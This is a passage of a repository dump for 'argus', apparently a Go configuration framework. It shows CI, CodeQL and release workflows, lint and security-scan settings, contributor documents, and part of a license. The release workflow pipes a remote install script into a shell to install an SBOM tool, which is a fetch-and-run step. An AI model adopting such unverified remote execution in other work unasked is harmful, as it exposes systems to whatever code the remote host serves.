agilira/argus/main 331k tokens More Tools
```
├── .codecov.yml (100 tokens)
├── .github/
   ├── codeql/
      ├── codeql-config.yml (300 tokens)
   ├── dependabot.yml (200 tokens)
   ├── workflows/
      ├── ci.yml (500 tokens)
      ├── codeql.yml (200 tokens)
      ├── dependabot-auto-merge.yml (400 tokens)
      ├── pr.yml (200 tokens)
      ├── release.yml (600 tokens)
├── .gitignore (300 tokens)
├── .gosec.json
├── CODE_OF_CONDUCT.md (1100 tokens)
├── CONTRIBUTING.md (600 tokens)
├── LICENSE.md (3.4k tokens)
├── Makefile (1300 tokens)
├── Makefile.ps1 (2.5k tokens)
├── README.md (2.3k tokens)
├── SECURITY.md (200 tokens)
├── argus.go (8.9k tokens)
├── argus_core_test.go (3.8k tokens)
├── argus_edge_test.go (900 tokens)
├── argus_fuzz_test.go (4.6k tokens)
├── argus_security_test.go (7.2k tokens)
├── argus_test.go (3.5k tokens)
├── argus_unit_test.go (41.4k tokens)
├── assets/
   ├── banner.png
├── audit.go (1800 tokens)
├── audit_backend.go (6k tokens)
├── audit_backend_test.go (11.3k tokens)
├── audit_test.go (1300 tokens)
├── benchmark_test.go (1600 tokens)
├── benchmarks/
   ├── README.md (700 tokens)
   ├── go.mod (100 tokens)
   ├── go.sum (100 tokens)
   ├── performance-report-20251016.txt (400 tokens)
   ├── ring_buffer_performance_test.go (1100 tokens)
├── boreaslite.go (3.7k tokens)
├── boreaslite_strategies_test.go (1300 tokens)
├── boreaslite_test.go (1500 tokens)
├── build.ps1 (500 tokens)
├── build.sh (500 tokens)
├── changelog/
   ├── v1.0.0.txt (1500 tokens)
   ├── v1.0.1.txt (1900 tokens)
   ├── v1.0.2.txt (2.5k tokens)
   ├── v1.0.3.txt (300 tokens)
   ├── v1.0.4.txt (800 tokens)
   ├── v1.0.5.txt (1100 tokens)
   ├── v1.0.6.txt (1300 tokens)
   ├── v1.0.7.txt (600 tokens)
├── clean_overhead_test.go (600 tokens)
├── cmd/
   ├── cli/
      ├── cli_commands_test.go (2.2k tokens)
      ├── cli_handle_test.go (4.4k tokens)
      ├── cli_integration_test.go (4.7k tokens)
      ├── handlers.go (3.2k tokens)
      ├── manager.go (1400 tokens)
      ├── manager_test.go (1200 tokens)
      ├── utils.go (1300 tokens)
├── config.go (1100 tokens)
├── config_binder.go (1900 tokens)
├── config_binder_test.go (3.6k tokens)
├── config_equals_test.go (900 tokens)
├── config_format_test.go (1500 tokens)
├── config_test.go (200 tokens)
├── config_validation.go (2.9k tokens)
├── config_validation_security_test.go (2.2k tokens)
├── config_validation_simple_test.go (300 tokens)
├── config_validation_test.go (3.5k tokens)
├── config_writer.go (6.5k tokens)
├── config_writer_comprehensive_test.go (1600 tokens)
├── config_writer_test.go (4.3k tokens)
├── doc.go (2.6k tokens)
├── docs/
   ├── API-REFERENCE.md (8.1k tokens)
   ├── ARCHITECTURE.md (3.1k tokens)
   ├── architecture-spinning-logic.md (2000 tokens)
   ├── audit-system.md (6.6k tokens)
   ├── cli-integration.md (2.4k tokens)
   ├── environment-config.md (2.3k tokens)
   ├── integrations.md (2.8k tokens)
   ├── parser-guide.md (2.4k tokens)
   ├── provider-tutorial.md (4.3k tokens)
   ├── quick-start.md (2.5k tokens)
   ├── remote-config-api.md (2.4k tokens)
├── env_config.go (4.6k tokens)
├── env_config_test.go (5.7k tokens)
├── error_handler_test.go (2k tokens)
├── examples/
   ├── cli/
      ├── README.md (1300 tokens)
      ├── go.mod (100 tokens)
      ├── go.sum (200 tokens)
      ├── main.go (100 tokens)
      ├── main_test.go (1200 tokens)
   ├── config_binding/
      ├── README.md (800 tokens)
      ├── config_binding_test.go (2.3k tokens)
      ├── go.mod (100 tokens)
      ├── go.sum (100 tokens)
      ├── main.go (1000 tokens)
   ├── config_validation/
      ├── README.md (200 tokens)
      ├── config_validation_test.go (2.7k tokens)
      ├── go.mod (100 tokens)
      ├── go.sum (100 tokens)
      ├── main.go (1300 tokens)
   ├── error_handling/
      ├── README.md (800 tokens)
      ├── error_handling_test.go (2.6k tokens)
      ├── go.mod (100 tokens)
      ├── go.sum (100 tokens)
      ├── main.go (1600 tokens)
   ├── multi_source_config/
      ├── README.md (1000 tokens)
      ├── go.mod (100 tokens)
      ├── go.sum (100 tokens)
      ├── main.go (1500 tokens)
      ├── main_test.go (3k tokens)
   ├── optimization_strategies/
      ├── README.md (300 tokens)
      ├── benchmark_test.go (3.3k tokens)
      ├── go.mod (100 tokens)
      ├── go.sum (100 tokens)
      ├── integration_test.go (2.9k tokens)
      ├── main.go (1400 tokens)
      ├── main_test.go (4.4k tokens)
   ├── otel_integration/
      ├── README.md (2.2k tokens)
      ├── go.mod (200 tokens)
      ├── go.sum (700 tokens)
      ├── main.go (800 tokens)
      ├── main_test.go (2.2k tokens)
      ├── otel.go (900 tokens)
      ├── otel_test.go (2k tokens)
├── go.mod (100 tokens)
├── go.sum (200 tokens)
├── graceful_shutdown_features_test.go (2k tokens)
├── graceful_shutdown_test.go (2000 tokens)
├── hcl_validation.go (300 tokens)
├── ini_validation.go (500 tokens)
├── ini_validation_test.go (400 tokens)
├── integration.go (2.2k tokens)
├── integration_test.go (3.6k tokens)
├── long_path_test.go (1000 tokens)
├── low_file_test.go (800 tokens)
├── no_consumer_test.go (300 tokens)
├── overhead-benchmarks/
   ├── README.md (400 tokens)
   ├── go.mod (100 tokens)
   ├── go.sum (100 tokens)
   ├── realistic_production_overhead_test.go (1500 tokens)
   ├── theoretical_minimal_overhead_test.go (600 tokens)
├── overhead_analysis_test.go (1500 tokens)
├── parser_robustness_test.go (1900 tokens)
├── parser_structured.go (4.1k tokens)
├── parser_text.go (1700 tokens)
├── parser_yaml_comprehensive_test.go (800 tokens)
├── parser_yaml_improvement_test.go (1000 tokens)
├── parser_yaml_nested_test.go (800 tokens)
├── parsers.go (1900 tokens)
├── path_limits_test.go (500 tokens)
├── plugin_system_test.go (1000 tokens)
├── production_overhead_test.go (1900 tokens)
├── properties_validation.go (400 tokens)
├── properties_validation_test.go (400 tokens)
├── realistic_benchmark_test.go (1200 tokens)
├── remote_config.go (3.8k tokens)
├── remote_config_fallback.go (2.6k tokens)
├── remote_config_fallback_test.go (4.6k tokens)
├── security_critical_test.go (1000 tokens)
├── simple_set_test.go (300 tokens)
├── single_event_bench_test.go (500 tokens)
├── utilities.go (1400 tokens)
├── utilities_comprehensive_test.go (5.7k tokens)
├── utilities_test.go (1700 tokens)
```


## /.codecov.yml

```yml path="/.codecov.yml" 
coverage:
  status:
    project:
      default:
        target: 70%
        threshold: 2%
    patch:
      default:
        target: auto
        threshold: 2%

comment:
  layout: "reach, diff, flags, files"
  behavior: default

ignore:
  - "**/*_test.go"
  - "examples/**"
  - "cmd/**"

```

## /.github/codeql/codeql-config.yml

```yml path="/.github/codeql/codeql-config.yml" 
# CodeQL Configuration for Argus Configuration Framework
# Focuses on configuration security, path traversal, and injection vulnerabilities

name: argus-configuration-security

# Disable default queries to use our custom security focus
disable-default-queries: false

# Include additional security queries relevant to configuration frameworks
queries:
  - uses: security-and-quality
  - uses: security-experimental
  
# Define custom paths for analysis
paths:
  - "**/*.go"

# Ignore test files and dependencies (focus on production code)
paths-ignore:
  - "**/*_test.go"
  - "**/testdata/**"
  - "**/vendor/**"
  - "**/examples/**"

# Packs for enhanced configuration security analysis
packs:
  - "codeql/go-queries"
  - "codeql/go-queries:AlertSuppression.ql"
  - "codeql/go-queries:Security"

# Query filters for configuration frameworks
query-filters:
  - include:
      id: go/path-injection
      # Critical for configuration file handling
  - include:
      id: go/zipslip
      # Important for archive handling in configs
  - exclude:
      id: go/unused-variable
      # Configuration structs may have unused fields for future compatibility
      
# Custom extraction configuration for Go configuration analysis
extractor-config:
  go:
    # Enable deep analysis for configuration handling functions
    index:
      filters:
        - include: "**/*.go"
        - exclude: "*_test.go"
    build_command: "go build ./..."
    
# Performance tuning for configuration framework analysis
compilation-cache: true
```

## /.github/dependabot.yml

```yml path="/.github/dependabot.yml" 
# AGILira Standard Dependabot Configuration
# Copy this file to .github/dependabot.yml in your project root

version: 2
updates:
  # Enable version updates for Go modules
  - package-ecosystem: "gomod"
    # Look for go.mod in the root directory
    directory: "/"
    # Check for updates daily
    schedule:
      interval: "daily"
      time: "09:00"
      timezone: "Europe/Rome"
    # Group updates to reduce PR noise
    groups:
      agilira:
        patterns:
          - "github.com/agilira/*"
      golang:
        patterns:
          - "golang.org/x/*"
      testing:
        patterns:
          - "github.com/stretchr/testify"
          - "github.com/go-test/*"
    # Auto-merge minor and patch updates for trusted dependencies
    open-pull-requests-limit: 5
    reviewers:
      - "agilira"
    assignees:
      - "agilira"
    commit-message:
      prefix: "[chore]"
      include: "scope"
```

## /.github/workflows/ci.yml

```yml path="/.github/workflows/ci.yml" 
name: CI/CD

on:
  push:
    branches: [ main, develop ]
  pull_request:
    branches: [ main ]

env:
  CGO_ENABLED: 1

jobs:
  test:
    name: Test Suite
    runs-on: ubuntu-latest
    steps:
    - name: Checkout
      uses: actions/checkout@v4

    - name: Setup Go
      uses: actions/setup-go@v5
      with:
        go-version: 'stable'
        cache: true

    - name: Install Dependencies
      run: |
        go install honnef.co/go/tools/cmd/staticcheck@latest
        go install github.com/securego/gosec/v2/cmd/gosec@latest
        go install golang.org/x/vuln/cmd/govulncheck@latest

    - name: Go Format Check
      run: |
        if [ "$(gofmt -l . | wc -l)" -gt 0 ]; then
          echo "Code not formatted:"
          gofmt -l .
          exit 1
        fi

    - name: Module Verification
      run: go mod verify

    - name: Go Vet
      run: go vet ./...

    - name: Staticcheck
      run: staticcheck ./...

    - name: Vulnerability Check
      run: govulncheck ./...

    - name: Security Scan (gosec)
      continue-on-error: true
      run: |
        echo "Running security scan..."
        gosec -conf .gosec.json ./... || true
        echo "Security scan completed"

    - name: Test with Race Detection
      run: go test -race -timeout 5m -v ./...

    - name: Test Coverage
      run: |
        go test -coverprofile=coverage.out ./...
        go tool cover -func=coverage.out

    - name: Upload coverage to Codecov
      uses: codecov/codecov-action@v4
      with:
        file: ./coverage.out
        flags: unittests
        name: codecov-umbrella
        fail_ci_if_error: false

  build:
    name: Build Matrix
    runs-on: ${{ matrix.os }}
    continue-on-error: ${{ matrix.os == 'macos-latest' }}
    strategy:
      fail-fast: false
      matrix:
        os: [ubuntu-latest, windows-latest, macos-latest]
        go-version: ['stable']  # Reduced to save minutes
        include:
          - os: macos-latest
            timeout: 5  # Shorter timeout for macOS due to runner availability issues
    steps:
    - name: Checkout
      uses: actions/checkout@v4

    - name: Setup Go
      uses: actions/setup-go@v5
      with:
        go-version: ${{ matrix.go-version }}
        cache: true

    - name: Build
      run: go build -v ./...
      timeout-minutes: ${{ matrix.timeout || 15 }}

    - name: Short Test (no race, faster)
      run: go test -short -timeout 5m ./...
      timeout-minutes: ${{ matrix.timeout || 15 }}

```

## /.github/workflows/codeql.yml

```yml path="/.github/workflows/codeql.yml" 
name: "CodeQL"

on:
  push:
    branches: [ main, develop ]
  pull_request:
    branches: [ main ]
  schedule:
    - cron: '0 2 * * 0'

jobs:
  analyze:
    name: Analyze
    runs-on: ubuntu-latest
    timeout-minutes: 360
    permissions:
      actions: read
      contents: read
      security-events: write

    strategy:
      fail-fast: false
      matrix:
        language: [ 'go' ]

    steps:
    - name: Checkout repository
      uses: actions/checkout@v4

    - name: Setup Go
      uses: actions/setup-go@v5
      with:
        go-version: 'stable'

    - name: Initialize CodeQL
      uses: github/codeql-action/init@v3
      with:
        languages: ${{ matrix.language }}
        config-file: ./.github/codeql/codeql-config.yml

    - name: Run govulncheck
      run: |
        go install golang.org/x/vuln/cmd/govulncheck@latest
        govulncheck ./...

    - name: Perform CodeQL Analysis
      uses: github/codeql-action/analyze@v3
      with:
        category: "/language:${{matrix.language}}"

```

## /.github/workflows/dependabot-auto-merge.yml

```yml path="/.github/workflows/dependabot-auto-merge.yml" 
name: Dependabot PR Auto-Merge

on:
  pull_request:
    types: [opened, synchronize, reopened]

jobs:
  dependabot-auto-merge:
    runs-on: ubuntu-latest
    if: github.actor == 'dependabot[bot]'
    steps:
      - name: Checkout code
        uses: actions/checkout@v5
        with:
          fetch-depth: 0

      - name: Set up Go
        uses: actions/setup-go@v5
        with:
          go-version: 'stable'

      - name: Cache Go modules
        uses: actions/cache@v4
        with:
          path: |
            ~/.cache/go-build
            ~/go/pkg/mod
          key: ${{ runner.os }}-go-${{ hashFiles('**/go.sum') }}
          restore-keys: |
            ${{ runner.os }}-go-

      - name: Run tests
        run: |
          go mod download
          go test -v ./...

      - name: Check if PR can be auto-merged
        id: auto-merge-check
        run: |
          # Check if this is a patch/minor update (not major)
          if echo "${{ github.event.pull_request.title }}" | grep -E "(patch|minor|deps\()" > /dev/null; then
            echo "can_auto_merge=true" >> $GITHUB_OUTPUT
          else
            echo "can_auto_merge=false" >> $GITHUB_OUTPUT
          fi

      - name: Enable auto-merge for Dependabot PRs
        if: steps.auto-merge-check.outputs.can_auto_merge == 'true'
        run: |
          gh pr merge --auto --squash "${{ github.event.pull_request.number }}"
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

      - name: Add comment for manual review
        if: steps.auto-merge-check.outputs.can_auto_merge == 'false'
        run: |
          gh pr comment "${{ github.event.pull_request.number }}" --body "**Manual Review Required**
          
          This appears to be a major version update that requires manual review.
          Please verify:
          - [ ] Breaking changes documentation
          - [ ] Compatibility with existing code
          - [ ] Performance impact
          - [ ] Security implications
          
          After review, manually merge when ready."
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

```

## /.github/workflows/pr.yml

```yml path="/.github/workflows/pr.yml" 
name: PR Quick Check

on:
  pull_request:
    branches: [ main ]

env:
  CGO_ENABLED: 1

jobs:
  quick-test:
    name: Quick Validation
    runs-on: ubuntu-latest
    steps:
    - name: Checkout
      uses: actions/checkout@v4

    - name: Setup Go
      uses: actions/setup-go@v5
      with:
        go-version: 'stable'
        cache: true

    - name: Quick Quality Check
      run: |
        # Format check
        test -z "$(gofmt -l .)"
        
        # Vet
        go vet ./...
        
        # Basic test
        go test -short ./...

    - name: Install Security Tools
      run: go install github.com/securego/gosec/v2/cmd/gosec@latest

    - name: Security Scan
      run: |
        # Only scan the main module and cmd, exclude examples and benchmarks with separate go.mod
        gosec --exclude=G104,G306,G301 \
          --exclude-dir=examples \
          --exclude-dir=benchmarks \
          --exclude-dir=overhead-benchmarks \
          ./ ./cmd/...

```

## /.github/workflows/release.yml

```yml path="/.github/workflows/release.yml" 
name: Release

on:
  push:
    tags:
      - 'v*'

permissions:
  contents: write
  id-token: write
  attestations: write

jobs:
  release:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout
      uses: actions/checkout@v4
      with:
        fetch-depth: 0

    - name: Set up Go
      uses: actions/setup-go@v5
      with:
        go-version: '1.24'

    - name: Install development tools
      run: make tools

    - name: Run tests
      run: make test

    - name: Run security checks
      run: make security

    - name: Build artifacts
      run: |
        mkdir -p dist
        
        # Build Argus CLI for multiple platforms
        GOOS=linux GOARCH=amd64 go build -ldflags='-w -s -buildid=' -trimpath -o dist/argus-linux-amd64 .
        GOOS=linux GOARCH=arm64 go build -ldflags='-w -s -buildid=' -trimpath -o dist/argus-linux-arm64 .
        GOOS=darwin GOARCH=amd64 go build -ldflags='-w -s -buildid=' -trimpath -o dist/argus-darwin-amd64 .
        GOOS=darwin GOARCH=arm64 go build -ldflags='-w -s -buildid=' -trimpath -o dist/argus-darwin-arm64 .
        GOOS=windows GOARCH=amd64 go build -ldflags='-w -s -buildid=' -trimpath -o dist/argus-windows-amd64.exe .
        
        # Create checksums
        cd dist
        sha256sum * > checksums.txt

    - name: Generate build provenance attestation
      uses: actions/attest-build-provenance@v1
      with:
        subject-path: 'dist/*'

    - name: Generate SBOM
      run: |
        # Generate SBOM from Go modules using syft
        curl -sSfL https://raw.githubusercontent.com/anchore/syft/main/install.sh | sh -s -- -b /usr/local/bin
        /usr/local/bin/syft . -o spdx-json=sbom.json
        
    - name: Generate SBOM attestation  
      uses: actions/attest-sbom@v1
      with:
        subject-path: 'dist/*'
        sbom-path: 'sbom.json'

    - name: Create Release
      uses: softprops/action-gh-release@v2
      with:
        files: |
          dist/*
        body: |
          ## Argus ${{ github.ref_name }}
          
          Dynamic configuration framework for Go applications with zero-allocation performance, universal format support, and ultra-fast CLI.
          
          ### Installation
          
          **Library:**
          \`\`\`bash
          go get github.com/agilira/argus@${{ github.ref_name }}
          \`\`\`
          
          **CLI Binary:**
          Download the appropriate binary for your platform from the attachments below.
          
          ### CLI Usage
          \`\`\`bash
          # Configuration management
          ./argus config get config.yaml server.port
          ./argus config set config.yaml database.host localhost
          ./argus config convert config.yaml config.json
          ./argus watch config.yaml --interval=1s
          \`\`\`
          
          ### Verification
          Verify release authenticity using GitHub CLI:
          \`\`\`bash
          gh attestation verify ./argus-* --owner agilira
          \`\`\`
          
          ### Changes
          See [changelog/${{ github.ref_name }}.txt](https://github.com/agilira/argus/blob/main/changelog/${{ github.ref_name }}.txt) for details.
        generate_release_notes: true
        draft: false
        prerelease: false
```

## /.gitignore

```gitignore path="/.gitignore" 
# Binaries for programs and plugins
*.exe
*.exe~
*.dll
*.so
*.dylib

# Test binary, built with `go test -c`
*.test

# Output of the go coverage tool, specifically when used with LiteIDE
*.out

# Dependency directories (remove the comment below to include it)
vendor/

# Go workspace file
go.work

# IDE and editor files
.vscode/
.idea/
*.swp
*.swo
*~

# OS generated files
.DS_Store
.DS_Store?
._*
.Spotlight-V100
.Trashes
ehthumbs.db
Thumbs.db

# Temporary files
tmp/
temp/
*.tmp
*.temp

# Log files
*.log
logs/

# Coverage reports
coverage.out
c.out

# Benchmark results
*.bench

# Performance profiles
*.prof
*.pprof

# Build artifacts
dist/
build/

# Environment files
.env
.env.local
.env.*.local

# Certificate files (for testing)
*.pem
*.key
*.crt

# Configuration files that might contain secrets
config.local.*
*secret*
*private*

# Argus specific
# Audit files (if they contain sensitive data)
audit_*.log
# Test configuration files
test_config.*
# Temporary test directories
argus_test_*
argus_universal_test_*

# Dev specific files and folders
chaos_test.go
deadlock_stress_test.go
extreme_deadlock_test.go
features_verification_test.go
production_test.go
rigorous_test.go
ROADMAP.md
stress_test.go
ultimate_deadlock_test.go
validation_strategy.md
realistic_benchmark_test.go
scalability_test.go
tests/
production_overhead_test.go
capacity_test.txt
features_verification_test.txt

# Goroutine leak detection tools (development only)
test_helper.go
goroutine_leak_test.go

# Demo and recording files (for development/recording only)
demo-script.sh
argus-demo.cast
RECORDING.md
*.cast
*-demo.sh
benchmark-demo.sh

# CLI binary (built from examples/cli)
argus
```

## /.gosec.json

```json path="/.gosec.json" 
{
  "excludes": [
    "G104",
    "G306", 
    "G301"
  ],
  "exclude-generated": true,
  "exclude-dirs": [
    "examples",
    "vendor",
    ".git"
  ],
  "severity": "medium",
  "confidence": "medium",
  "fmt": "text"
}

```

## /CODE_OF_CONDUCT.md

# Contributor Covenant Code of Conduct

## Our Pledge

We as members, contributors, and leaders pledge to make participation in our community a harassment-free experience for everyone, regardless of age, body size, visible or invisible disability, ethnicity, sex characteristics, gender identity and expression, level of experience, education, socio-economic status, nationality, personal appearance, race, religion, or sexual identity and orientation.

We pledge to act and interact in ways that contribute to an open, welcoming, diverse, inclusive, and healthy community.

## Our Standards

Examples of behavior that contributes to a positive environment for our community include:

- Demonstrating empathy and kindness toward other people
- Being respectful of differing opinions, viewpoints, and experiences
- Giving and gracefully accepting constructive feedback
- Accepting responsibility and apologizing to those affected by our mistakes, and learning from the experience
- Focusing on what is best not just for us as individuals, but for the overall community

Examples of unacceptable behavior include:

- The use of sexualized language or imagery, and sexual attention or advances of any kind
- Trolling, insulting or derogatory comments, and personal or political attacks
- Public or private harassment
- Publishing others’ private information, such as a physical or email address, without their explicit permission
- Other conduct which could reasonably be considered inappropriate in a professional setting

## Enforcement Responsibilities

Community leaders are responsible for clarifying and enforcing our standards of acceptable behavior and will take appropriate and fair corrective action in response to any behavior that they deem inappropriate, threatening, offensive, or harmful.

Community leaders have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, and will communicate reasons for moderation decisions when appropriate.

## Scope

This Code of Conduct applies within all community spaces, and also applies when an individual is officially representing the community in public spaces. Examples of representing our community include using an official e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event.

## Enforcement

Instances of abusive, harassing, or otherwise unacceptable behavior may be reported to the community leaders responsible for enforcement at github@agilira.com. All complaints will be reviewed and investigated promptly and fairly.

All community leaders are obligated to respect the privacy and security of the reporter of any incident.

## Enforcement Guidelines

Community leaders will follow these Community Impact Guidelines in determining the consequences for any action they deem in violation of this Code of Conduct:

### 1. Correction

**Community Impact**: Use of inappropriate language or other behavior deemed unprofessional or unwelcome in the community.

**Consequence**: A private, written warning from community leaders, providing clarity around the nature of the violation and an explanation of why the behavior was inappropriate. A public apology may be requested.

### 2. Warning

**Community Impact**: A violation through a single incident or series of actions.

**Consequence**: A warning with consequences for continued behavior. No interaction with the people involved, including unsolicited interaction with those enforcing the Code of Conduct, for a specified period of time. This includes avoiding interactions in community spaces as well as external channels like social media. Violating these terms may lead to a temporary or permanent ban.

### 3. Temporary Ban

**Community Impact**: A serious violation of community standards, including sustained inappropriate behavior.

**Consequence**: A temporary ban from any sort of interaction or public communication with the community for a specified period of time. No public or private interaction with the people involved, including unsolicited interaction with those enforcing the Code of Conduct, is allowed during this period. Violating these terms may lead to a permanent ban.

### 4. Permanent Ban

**Community Impact**: Demonstrating a pattern of violation of community standards, including sustained inappropriate behavior, harassment of an individual, or aggression toward or disparagement of classes of individuals.

**Consequence**: A permanent ban from any sort of public interaction within the community.

## Attribution

This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 2.1, available at [https://www.contributor-covenant.org/version/2/1/code_of_conduct.html](https://www.contributor-covenant.org/version/2/1/code_of_conduct.html).

Community Impact Guidelines were inspired by [Mozilla’s code of conduct enforcement ladder](https://github.com/mozilla/diversity).

For answers to common questions about this code of conduct, see the FAQ at [https://www.contributor-covenant.org/faq](https://www.contributor-covenant.org/faq). Translations are available at [https://www.contributor-covenant.org/translations](https://www.contributor-covenant.org/translations).

[homepage]: https://www.contributor-covenant.org


## /CONTRIBUTING.md

# Contributing to Argus

First, thank you for considering contributing to Argus. We appreciate the time and effort you are willing to invest. This document outlines the guidelines for contributing to the project to ensure a smooth and effective process for everyone involved.

## How to Contribute

We welcome contributions in various forms, including:
- Reporting bugs
- Suggesting enhancements
- Improving documentation
- Submitting code changes

### Reporting Bugs

If you encounter a bug, please open an issue on our GitHub repository. A well-documented bug report is crucial for a swift resolution. Please include the following information:

- **Go Version**: The output of `go version`.
- **Operating System**: Your OS and version (e.g., Ubuntu 22.04, macOS 12.6).
- **Clear Description**: A concise but detailed description of the bug.
- **Steps to Reproduce**: A minimal, reproducible example that demonstrates the issue. This could be a small Go program.
- **Expected vs. Actual Behavior**: What you expected to happen and what actually occurred.
- **Logs or Error Messages**: Any relevant logs or error output, formatted as code blocks.

### Suggesting Enhancements

If you have an idea for a new feature or an improvement to an existing one, please open an issue to start a discussion. This allows us to align on the proposal before any significant development work begins.

## Development Process

1.  **Fork the Repository**: Start by forking the main argus repository to your own GitHub account.
2.  **Clone Your Fork**: Clone your forked repository to your local machine.
    ```bash
    git clone https://github.com/YOUR_USERNAME/argus.git
    cd argus
    ```
3.  **Create a Branch**: Create a new branch for your changes. Use a descriptive name (e.g., `fix/....` or `feature/....`).
    ```bash
    git checkout -b your-branch-name
    ```
4.  **Make Changes**: Write your code. Ensure your code adheres to Go's best practices.
5.  **Format Your Code**: Run `gofmt` to ensure your code is correctly formatted.
    ```bash
    gofmt -w .
    ```
6.  **Add Tests**: If you are adding a new feature or fixing a bug, please add corresponding unit or integration tests. All tests must pass.
    ```bash
    go test ./...
    ```
7.  **Commit Your Changes**: Use a clear and descriptive commit message.
    ```bash
    git commit -m "feat: Add support for XYZ feature"
    ```
8.  **Push to Your Fork**: Push your changes to your forked repository.
    ```bash
    git push origin your-branch-name
    ```
9.  **Open a Pull Request**: Open a pull request from your branch to the `main` branch of the official argus repository. Provide a clear title and description for your PR, referencing any related issues.

## Pull Request Guidelines

- **One PR per Feature**: Each pull request should address a single bug or feature.
- **Clear Description**: Explain the "what" and "why" of your changes.
- **Passing Tests**: Ensure that the full test suite passes.
- **Documentation**: If your changes affect public APIs or behavior, update the relevant documentation (in-code comments, `README.md`, or files in the `docs/` directory).

Thank you for helping make Argus better!

---

Argus • an AGILira fragment


## /LICENSE.md

Copyright (c) 2025 AGILira - A. Giordano

Mozilla Public License Version 2.0
==================================

1. Definitions
--------------

1.1. "Contributor"
    means each individual or legal entity that creates, contributes to
    the creation of, or owns Covered Software.

1.2. "Contributor Version"
    means the combination of the Contributions of others (if any) used
    by a Contributor and that particular Contributor's Contribution.

1.3. "Contribution"
    means Covered Software of a particular Contributor.

1.4. "Covered Software"
    means Source Code Form to which the initial Contributor has attached
    the notice in Exhibit A, the Executable Form of such Source Code
    Form, and Modifications of such Source Code Form, in each case
    including portions thereof.

1.5. "Incompatible With Secondary Licenses"
    means

    (a) that the initial Contributor has attached the notice described
        in Exhibit B to the Covered Software; or

    (b) that the Covered Software was made available under the terms of
        version 1.1 or earlier of the License, but not also under the
        terms of a Secondary License.

1.6. "Executable Form"
    means any form of the work other than Source Code Form.

1.7. "Larger Work"
    means a work that combines Covered Software with other material, in
    a separate file or files, that is not Covered Software.

1.8. "License"
    means this document.

1.9. "Licensable"
    means having the right to grant, to the maximum extent possible,
    whether at the time of the initial grant or subsequently, any and
    all of the rights conveyed by this License.

1.10. "Modifications"
    means any of the following:

    (a) any file in Source Code Form that results from an addition to,
        deletion from, or modification of the contents of Covered
        Software; or

    (b) any new file in Source Code Form that contains any Covered
        Software.

1.11. "Patent Claims" of a Contributor
    means any patent claim(s), including without limitation, method,
    process, and apparatus claims, in any patent Licensable by such
    Contributor that would be infringed, but for the grant of the
    License, by the making, using, selling, offering for sale, having
    made, import, or transfer of either its Contributions or its
    Contributor Version.

1.12. "Secondary License"
    means either the GNU General Public License, Version 2.0, the GNU
    Lesser General Public License, Version 2.1, the GNU Affero General
    Public License, Version 3.0, or any later versions of those
    licenses.

1.13. "Source Code Form"
    means the form of the work preferred for making modifications.

1.14. "You" (or "Your")
    means an individual or a legal entity exercising rights under this
    License. For legal entities, "You" includes any entity that
    controls, is controlled by, or is under common control with You. For
    purposes of this definition, "control" means (a) the power, direct
    or indirect, to cause the direction or management of such entity,
    whether by contract or otherwise, or (b) ownership of more than
    fifty percent (50%) of the outstanding shares or beneficial
    ownership of such entity.

2. License Grants and Conditions
--------------------------------

2.1. Grants

Each Contributor hereby grants You a world-wide, royalty-free,
non-exclusive license:

(a) under intellectual property rights (other than patent or trademark)
    Licensable by such Contributor to use, reproduce, make available,
    modify, display, perform, distribute, and otherwise exploit its
    Contributions, either on an unmodified basis, with Modifications, or
    as part of a Larger Work; and

(b) under Patent Claims of such Contributor to make, use, sell, offer
    for sale, have made, import, and otherwise transfer either its
    Contributions or its Contributor Version.

2.2. Effective Date

The licenses granted in Section 2.1 with respect to any Contribution
become effective for each Contribution on the date the Contributor first
distributes such Contribution.

2.3. Limitations on Grant Scope

The licenses granted in this Section 2 are the only rights granted under
this License. No additional rights or licenses will be implied from the
distribution or licensing of Covered Software under this License.
Notwithstanding Section 2.1(b) above, no patent license is granted by a
Contributor:

(a) for any code that a Contributor has removed from Covered Software;
    or

(b) for infringements caused by: (i) Your and any other third party's
    modifications of Covered Software, or (ii) the combination of its
    Contributions with other software (except as part of its Contributor
    Version); or

(c) under Patent Claims infringed by Covered Software in the absence of
    its Contributions.

This License does not grant any rights in the trademarks, service marks,
or logos of any Contributor (except as may be necessary to comply with
the notice requirements in Section 3.4).

2.4. Subsequent Licenses

No Contributor makes additional grants as a result of Your choice to
distribute the Covered Software under a subsequent version of this
License (see Section 10.2) or under the terms of a Secondary License (if
permitted under the terms of Section 3.3).

2.5. Representation

Each Contributor represents that the Contributor believes its
Contributions are its original creation(s) or it has sufficient rights
to grant the rights to its Contributions conveyed by this License.

2.6. Fair Use

This License is not intended to limit any rights You have under
applicable copyright doctrines of fair use, fair dealing, or other
equivalents.

2.7. Conditions

Sections 3.1, 3.2, 3.3, and 3.4 are conditions of the licenses granted
in Section 2.1.

3. Responsibilities
-------------------

3.1. Distribution of Source Form

All distribution of Covered Software in Source Code Form, including any
Modifications that You create or to which You contribute, must be under
the terms of this License. You must inform recipients that the Source
Code Form of the Covered Software is governed by the terms of this
License, and how they can obtain a copy of this License. You may not
attempt to alter or restrict the recipients' rights in the Source Code
Form.

3.2. Distribution of Executable Form

If You distribute Covered Software in Executable Form then:

(a) such Covered Software must also be made available in Source Code
    Form, as described in Section 3.1, and You must inform recipients of
    the Executable Form how they can obtain a copy of such Source Code
    Form by reasonable means in a timely manner, at a charge no more
    than the cost of distribution to the recipient; and

(b) You may distribute such Executable Form under the terms of this
    License, or sublicense it under different terms, provided that the
    license for the Executable Form does not attempt to limit or alter
    the recipients' rights in the Source Code Form under this License.

3.3. Distribution of a Larger Work

You may create and distribute a Larger Work under terms of Your choice,
provided that You also comply with the requirements of this License for
the Covered Software. If the Larger Work is a combination of Covered
Software with a work governed by one or more Secondary Licenses, and the
Covered Software is not Incompatible With Secondary Licenses, this
License permits You to additionally distribute such Covered Software
under the terms of such Secondary License(s), so that the recipient of
the Larger Work may, at their option, further distribute the Covered
Software under the terms of either this License or such Secondary
License(s).

3.4. Notices

You may not remove or alter the substance of any license notices
(including copyright notices, patent notices, disclaimers of warranty,
or limitations of liability) contained within the Source Code Form of
the Covered Software, except that You may alter any license notices to
the extent required to remedy known factual inaccuracies.

3.5. Application of Additional Terms

